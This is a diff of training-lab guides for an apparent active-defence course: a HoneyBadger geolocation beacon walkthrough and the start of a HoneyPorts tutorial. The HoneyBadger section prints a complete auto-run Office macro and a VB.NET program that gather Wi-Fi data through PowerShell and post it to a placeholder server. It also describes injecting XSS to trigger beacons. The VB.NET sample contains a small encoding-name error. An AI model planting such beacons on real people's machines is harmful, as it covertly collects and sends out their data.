+`~/ADCD/honeybadger/`
+
+
+Usage
+-----
+- In order to use the latest version of **HoneyBadger**, **Python 3** must be installed, as well as **python3-pip**. These should both be installed on the **ADHD image**
+
+```bash
+cd ~/ADCD/honeybadger/server
+```
+
+```bash
+source venv/bin/activate
+```
+
+- Finally, from the same directory, run the HoneyBadger server:
+```bash
+python3 honeybadger.py -ik [IPSTACK_KEY] -gk [GOOGLE_KEY]
+```
+
+
+>[!NOTE]
+>
+>Though HoneyBadger will still run without API keys, functionality is severely limited without them.
+
+
+# Example 1: Overview
+
+- The **HoneyBadger UI** has many features. This section will give a brief overview of HoneyBadger's pages.
+
+- Please surf to `http://<YOUR_LINUX_IP>:5000`
+
+
+>[!IMPORTANT]
+>
+>PLEASE USE FIREFOX!!!!
+
+- The user and password are `adhd`.
+
+- Navigate to the HoneyBadger server, and you will be presented with the following screen:
+
+![](../HoneyBadger_files/hb_login.png)
+
+- Use the credentials set earlier to log in, and you will be brought to the map.
+
+- To navigate to other pages of HoneyBadger, use the navigation bar in the top right corner:
+
+![](../HoneyBadger_files/hb_navbar.png)
+
+### 1. Map
+- The map is the default landing page after logging in.
+
+![](../HoneyBadger_files/hb_map.png)
+
+- The map is the main event of HoneyBadger in terms of presentation, and will pin a location when a beacon is triggered.
+
+### 2. Targets
+- Navigate to the targets page.
+
+![](../HoneyBadger_files/hb_targets.png)
+
+- The targets page is where targets can be observed, added, or removed, The page also serves as a way to generate several agents that are not quickly generated manually.
+
+### 3. Beacons
+- Navigate to the beacons page.
+
+![](../HoneyBadger_files/hb_beacons.png)
+
+- The beacons page maintains a list of beacons that connect to HoneyBadger and successfully geolocate. Beacons can be removed from this page as well.
+
+### 4. Log
+- Navigate to the log page.
+
+![](../HoneyBadger_files/hb_log_empty.png)
+
+- The log page is populated with information as beacons attempt to connect to the HoneyBadger server, and may be empty if accessed before any beacons connect to the server.
+
+### 5. Profile
+- Navigate to the profile page.
+
+![](../HoneyBadger_files/hb_profile.png)
+
+- The profile page allows for changing the password of the currently logged in account.
+
+### 6. Admin
+- Navigate to the admin page.
+
+![](../HoneyBadger_files/hb_admin.png)
+
+- The admin page is where administrative actions can be performed on accounts, and where new accounts can be added.
+
+### 7. Logout
+- Clicking logout on the navbar will log you out, bringing you back to the login page.
+
+![](../HoneyBadger_files/hb_logout.png)
+
+>[!NOTE]
+> All pages containing a table of records can be sorted by clicking on the table headings.
+
+# Example 2: Using the Map
+
+- Navigate to the map page.
+
+![](../HoneyBadger_files/hb_map.png)
+
+- At its core, the map page uses the Google Maps API, and functions identically to the standard Google Maps.
+
+- Several options are available for filtering map points by targets and by agents, using the map legend:
+
+![](../HoneyBadger_files/hb_map_legend.png)
+
+- As targets are added or unique agents are used to beacon into a target, they will show up in this legend. Toggling checkboxes in the legend enables filtering of beacons that are displayed in the map.
+
+- Points on the map can be clicked to display information about the machine that beaconed in:
+
+![](../HoneyBadger_files/hb_map_beacondetails.png)
+
+
+# Example 3: Working with Targets
+
+- Navigate to the targets page.
+
+![](../HoneyBadger_files/hb_targets.png)
+
+- Take a closer look at the information associated with the demo target:
+
+![](../HoneyBadger_files/hb_targets_targetinfo.png)
+
+- Moving left to right:
+
+* id: list id number
+* name: name of the target
+* guid: unique id of the target
+* beacon_count: number of beacons associated with the target
+* action: available actions regarding the target
+    - macro: generate a VBA macro beacon for the target
+    - VB.NET: generate a VB.NET beacon for the target
+    - demo: navigate to the target's demo page
+    - delete: delete the target
+
+- Note that clicking on any of the first four table headings will sort the table based on that column in ascending or descending order, as indicated by an arrow that appears upon clicking.
+
+- To add a new target, enter the target name in the field at the top of the page, and click the add button.
+
+- The new target will appear in the list:
+
+![](../HoneyBadger_files/hb_targets_targetadd.png)
+
+- Two agents can be generated from this page, one for VBA Office macros and one for VB.NET.
+
+- Clicking on the macro button will show the macro in a popup:
+
+![](../HoneyBadger_files/hb_targets_targetVBA.png)
+
+- Clicking on on the VB.NET button will show the VB.NET code in a popup:
+
+![](../HoneyBadger_files/hb_targets_targetVBNET.png)
+
+>[!NOTE]
+>
+>Though HoneyBadger attempts to copy the code to the clipboard, it's safest to simply copy the macro by hand.
+
+- To delete a target, click the target's delete button. A prompt will appear:
+
+![](../HoneyBadger_files/hb_targets_targetdelete.png)
+
+- Click OK, and the target will be removed from the list.
+
+
+# Example 4: Working with Beacons
+
+- Navigate to the beacons page.
+
+![](../HoneyBadger_files/hb_beacons.png)
+
+- Take a closer look at the information associated with the first demo beacon:
+
+![](../HoneyBadger_files/hb_beacons_beaconinfo.png)
+
+- Moving left to right:
+
+* id: list id number
+* target: which target the beacon associated with
+* agent: the agent that the beacon used to communicate with the server
+* lat: geolocation latitude of the beacon
+* lng: geolocation longitude of the beacon
+* acc: geolocation accuracy of the beacon
+* ip: IP address of the beacon
+* created: timestamp of beacon creation
+* action: available action regarding the target
+    - delete: delete the beacon
+
+- Using an agent, beacon into HoneyBadger, and refresh the beacons page to see a new beacon added to the list:
+
+![](../HoneyBadger_files/hb_beacons_beaconadded.png)
+
+- To delete a beacon, click the beacon's delete button. A prompt will appear:
+
+![](../HoneyBadger_files/hb_beacons_beacondelete.png)
+
+- Click OK, and the beacon will be removed from the list
+
+
+# Example 5: Observing the Log
+
+- Navigate to the log page.
+
+![](../HoneyBadger_files/hb_log.png)
+
+- The log page has been populated with information after the beacon was added in Example 4. The log contains information pertaining to the beacon, and will contain information if a beacon is unable to geolocate.
+
+# Example 6: Changing Profile Information
+
+- Navigate to the profile page.
+
+![](../HoneyBadger_files/hb_profile.png)
+
+- To change a password, fill in the fields accordingly. Note that passwords set with the profile page must meet minimum complexity requirements of a minimum of 10 characters, of which all four character classes (uppercase letters, lowercase letters, special characters, and numbers) must be used.
+
+- If the password does not meet minimum complexity requirements, the password is rejected and the user is notified:
+
+![](../HoneyBadger_files/hb_profile_badcomplexity.png)
+
+- Upon successful password change, the user is notified:
+
+![](../HoneyBadger_files/hb_profile_profileupdated.png)
+
+# Example 7: Administration
+
+- Navigate to the admin page.
+
+![](../HoneyBadger_files/hb_admin.png)
+
+- Note that modification of the current user is not allowed. If this is attempted, the user is notified of this:
+
+![](../HoneyBadger_files/hb_admin_selfmodify.png)
+
+- To add a new user, enter an email address in the box above, and click initialize. The new user will appear in the list:
+
+![](../HoneyBadger_files/hb_admin_useradded.png)
+
+- To get an activation link to the user, click the get link button. The link will be copied to the clipboard.
+
+- To delete a user, click the user's delete button. The following prompt will appear:
+
+![](../HoneyBadger_files/hb_admin_userdelete.png)
+
+- Click OK, and the user will be removed from the list:
+
+![](../HoneyBadger_files/hb_admin_userdeleted.png)
+
+- Example 8: Agents
+
+### 1. Demo Page
+
+- Navigate to the targets page.
+
+![](../HoneyBadger_files/hb_targets.png)
+
+- Click on the demo button to be taken to the demo page:
+
+![](../HoneyBadger_files/hb_demo.png)
+
+- Enter some XSS code into the first field, and the current user's password into the second field, and click submit.
+
+- If the inputted XSS code worked, the following string of popups will appear.
+
+![](../HoneyBadger_files/hb_demo_locationrequest.png)
+
+- Click on Share Location.
+
+![](../HoneyBadger_files/hb_demo_consentprompt.png)
+
+- Click OK.
+
+![](../HoneyBadger_files/hb_demo_appletprompt.png)
+
+- Click Allow Now.
+
+![](../HoneyBadger_files/hb_demo_appletprompt_again.png)
+
+- Click Run.
+
+![](../HoneyBadger_files/hb_demo_appletsecurity.png)
+
+- Click Yes.
+
+![](../HoneyBadger_files/hb_demo_applethoney.png)
+
+- Click Yes.
+
+![](../HoneyBadger_files/hb_demo_applethoney_again.png)
+
+- After clicking through all of the prompts, the page will load. Reload the HoneyBadger beacons page to see that a new beacon is added:
+![](../HoneyBadger_files/hb_demo_jsbeacon.png)
+
+
+### 2. VBA Macro
+The VBA macro code are not included as comments in the generated popup for the sake of brevity. The VBA macro functionality is explained here. In short, the VBA macro imitates the powershell script.
+
+    Sub AutoOpen()
+        ' Create an instance of a WSH shell for system commands
+        Set objWSH = CreateObject("WScript.Shell")
+
+        ' Run the netsh command via powershell for automatic wireless survey
+        wifi = objWSH.Exec("powershell netsh wlan show networks mode=bssid | findstr 'SSID Signal Channel'").StdOut.ReadAll
+        
+        ' Open a file handle to a temporary file and write netsh results to file
+        Open Environ("temp") & "\wifidat.txt" For Output As #1
+            Print #1, wifi
+        Close #1
+        
+        ' Read contents in from temp file, fixing encoding issues with the web request
+        wifi = objWSH.Exec("powershell Get-Content %TEMP%\wifidat.txt -Encoding UTF8 -Raw").StdOut.ReadAll
+
+        ' Remove the temporary file
+        Kill Environ("temp") & "\wifidat.txt"
+
+        ' Base64-encode the netsh data for sending.
+        wifienc = objWSH.Exec("powershell -Command ""& {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('" & wifi & "'))}""").StdOut.ReadAll
+
+        ' Create a web object
+        Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
+
+        ' Open the connection via POST request to the HoneyBadger server
+        objHTTP.Open "POST", "http://<SERVER>:5000/api/beacon/aedc4c63-8d13-4a22-81c5-d52d32293867/VBA"
+
+        ' Set request headers to make the server aware of the POST form data
+        objHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
+
+        ' Send the properly formatted POST form to the server
+        objHTTP.Send "os=windows&data=" & wifienc
+    End Sub
+
+To use the macro code, simply open a document, paste this macro inside, and save as a .docm file. Upon opening and accepting to run code, the macro will be triggered and the beacon will be added.
+
+
+### 3. VB.NET Script
+The VB.NET code is identical in function and near identical in structure to the VBA macro. Changes needed to be made to make it a valid VB.NET script, for version difference issues between VB.NET and VBA. Like the macro, the VB.NET functionality is explained here:
+
+    Imports System.IO
+    
+    Module HoneyBadgerBeacon
+        Sub Main()
+            ' Create and initialize a new WSH shell object
+            Dim objWSH As New Object
+            objWSH = CreateObject("WScript.Shell")
+
+            ' Create and initialize the wifi data variable
+            Dim wifi As String
+            wifi = objWSH.Exec("powershell netsh wlan show networks mode=bssid | findstr 'SSID Signal Channel'").StdOut.ReadAll
+            
+            ' Create a temp file
+            Dim objWriter As New System.IO.StreamWriter(Environ("temp") & "\wifidat.txt")
+            
+            ' Write data to file
+            objWriter.Write(wifi)
+
+            ' Close file
+            objWriter.Close(0)
+            
+            ' Read in the temp file contents with proper encoding
+            wifi = objWSH.Exec("powershell Get-Content %TEMP%\wifidat.txt -Encoding UTF8 -Raw").StdOut.ReadAll
+            
+            ' Delete temp file
+            Kill(Environ("temp") & "\wifidat.txt")
+
+            ' Base64-encode data
+            wifi = objWSH.Exec("powershell -Command ""& {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF88.GetBytes('" & wifi & "'))}""").StdOut.ReadAll
+
+            ' Create new web object
+            Dim objHTTP As New Object
+            objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
+
+            ' Open POST request to server
+            objHTTP.Open("POST", "http://<SERVER>:5000/api/beacon/aedc4c63-8d13-4a22-81c5-d52d32293867/VB")
+
+            ' Set request headers to notify server of POST form data
+            objHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
+
+            ' Send the formatted data to the server
+            objHTTP.Send("os=windows&data=" & wifi)
+        End Sub
+    End Module
+
+Copy this script into a file with a .vb extension, and run vbc <FILENAME>.vb to compile, and then run <FILENAME>.exe to create the beacon.
+
+
+### 4. HTML
+- To use a beacon with the HTML agent, go to the targets page and copy the GUID of the desired target, and create a URL formatted like so:
+`http://<SERVER>:5000/api/beacon/<GUID>/HTML?lat=<LAT>&lng=<LNG>&acc=<ACC>`
+
+- Navigate to this page in a browser. The server will return a 404
+
+
+### 5. CMD
+- The CMD agent is a type of HTML agent, as the beacon is created via web requests on the command line. There are two utilities in the util directory of HoneyBadger, one for windows and one for linux. They utilize Google's geolocation API. Usage information is available in those scripts. 
+
+ ***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/HoneyShare.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Beelzebub.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_profileinfo.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_profileinfo.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_profileinfo.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_profileinfo.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_selfmodify.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_selfmodify.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_selfmodify.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_selfmodify.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_useradded.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_useradded.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_useradded.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_useradded.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_userdelete.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_userdelete.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_userdelete.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_userdelete.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_userdeleted.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_userdeleted.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_admin_userdeleted.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_admin_userdeleted.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons_beaconadded.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons_beaconadded.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons_beaconadded.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons_beaconadded.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons_beacondelete.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons_beacondelete.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons_beacondelete.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons_beacondelete.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons_beaconinfo.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons_beaconinfo.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_beacons_beaconinfo.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_beacons_beaconinfo.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_applethoney.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_applethoney.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_applethoney.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_applethoney.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_applethoney_again.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_applethoney_again.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_applethoney_again.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_applethoney_again.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_appletprompt.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_appletprompt.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_appletprompt.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_appletprompt.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_appletprompt_again.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_appletprompt_again.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_appletprompt_again.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_appletprompt_again.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_appletsecurity.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_appletsecurity.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_appletsecurity.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_appletsecurity.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_consentprompt.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_consentprompt.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_consentprompt.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_consentprompt.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_jsbeacon.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_jsbeacon.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_jsbeacon.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_jsbeacon.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_locationrequest.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_locationrequest.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_demo_locationrequest.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_demo_locationrequest.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_log.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_log.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_log.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_log.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_log_empty.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_log_empty.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_log_empty.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_log_empty.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_login.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_login.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_login.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_login.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_logout.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_logout.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_logout.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_logout.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_map.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_map.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_map.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_map.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_map_beacondetails.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_map_beacondetails.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_map_beacondetails.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_map_beacondetails.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_map_legend.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_map_legend.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_map_legend.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_map_legend.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_navbar.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_navbar.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_navbar.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_navbar.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile_badcomplexity.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile_badcomplexity.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile_badcomplexity.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile_badcomplexity.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile_passwordchange.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile_passwordchange.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile_passwordchange.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile_passwordchange.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile_profileupdated.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile_profileupdated.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_profile_profileupdated.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_profile_profileupdated.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetVBA.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetVBA.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetVBA.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetVBA.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetVBNET.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetVBNET.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetVBNET.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetVBNET.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetadd.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetadd.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetadd.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetadd.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetdelete.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetdelete.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetdelete.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetdelete.png
diff --git a/IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetinfo.png b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetinfo.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/HoneyBadger_files/hb_targets_targetinfo.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/hb_targets_targetinfo.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts.md b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts.md
new file mode 100644
index 00000000..1d2ec135
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyPorts/HoneyPorts.md
@@ -0,0 +1,255 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# Honey Ports
+
+# Windows VM
+
+### Website
+
+<https://github.com/adhdproject/honeyports>
+
+## Description
+
+A Python based cross-platform HoneyPort solution, created by Paul Asadoorian.
+
+## Install Location
+
+```bash
+~/ADCD/honeyports
+```
+
+## Example 1: Monitoring A Port With HoneyPorts
+
+- Open an **Ubuntu Shell**
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/a5f0310b-d0bf-4ed6-9e0d-5514b6c98641" />
+
+Change to the Honeyports directory and execute the latest version of the script:
+
+```bash
+cd ~/ADCD/honeyports
+```
+
+```bash
+sudo python3 ./honeyports.py -p 3389 -h localhost
+```
+
+Output:
+<pre>
+Listening on  0.0.0.0 IP:  0.0.0.0  :  3389
+</pre>
+        
+- We can confirm that the listening is taking place with lsof:
+
+```bash
+sudo lsof -i -P | grep python
+```
+
+Output:
+<pre>
+python   26560     root    3r  IPv4 493595      0t0  TCP *:3389 (LISTEN)
+</pre>
+
+Looks like we're good.
+
+Any connection attempts to that port will result in an instant ban for the IP address in question.
+Let's simulate this next.
+
+### Example 2: Blacklisting In Action
+
+- If Honeyports is not listening on 3389 please follow the instructions in **[Example 1: Monitoring A Port With HoneyPorts]**.
+
+- Once you have Honeyports online and a backup Windows machine to connect to Honeyports from, let's proceed.
+
+- First we need to get the IP address of the ADHD instance.
+
+```bash
+ifconfig
+```
+
+Output:
+```
+        eth0      Link encap:Ethernet  HWaddr 08:00:27:65:3c:64
+                  inet addr:192.168.1.109  Bcast:192.168.1.255  Mask:255.255.255.0
+                  inet6 addr: fe80::a00:27ff:fe65:3c64/64 Scope:Link
+                  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+                  RX packets:46622 errors:0 dropped:0 overruns:0 frame:0
+                  TX packets:8298 errors:0 dropped:0 overruns:0 carrier:0
+                  collisions:0 txqueuelen:1000
+                  RX bytes:14057203 (14.0 MB)  TX bytes:2659309 (2.6 MB)
+
+        lo        Link encap:Local Loopback
+                  inet addr:127.0.0.1  Mask:255.0.0.0
+                  inet6 addr: ::1/128 Scope:Host
+                  UP LOOPBACK RUNNING  MTU:16436  Metric:1
+                  RX packets:94405 errors:0 dropped:0 overruns:0 frame:0
+                   TX packets:94405 errors:0 dropped:0 overruns:0 carrier:0
+                     collisions:0 txqueuelen:0
+                  RX bytes:37127292 (37.1 MB)  TX bytes:37127292 (37.1 MB)
+```
+>[!IMPORTANT]
+>
+> Your IP will be **different**, use **yours**
+
+- We can see from the `ifconfig` output that my **ADHD instance** has an IP of **192.168.1.109**
+
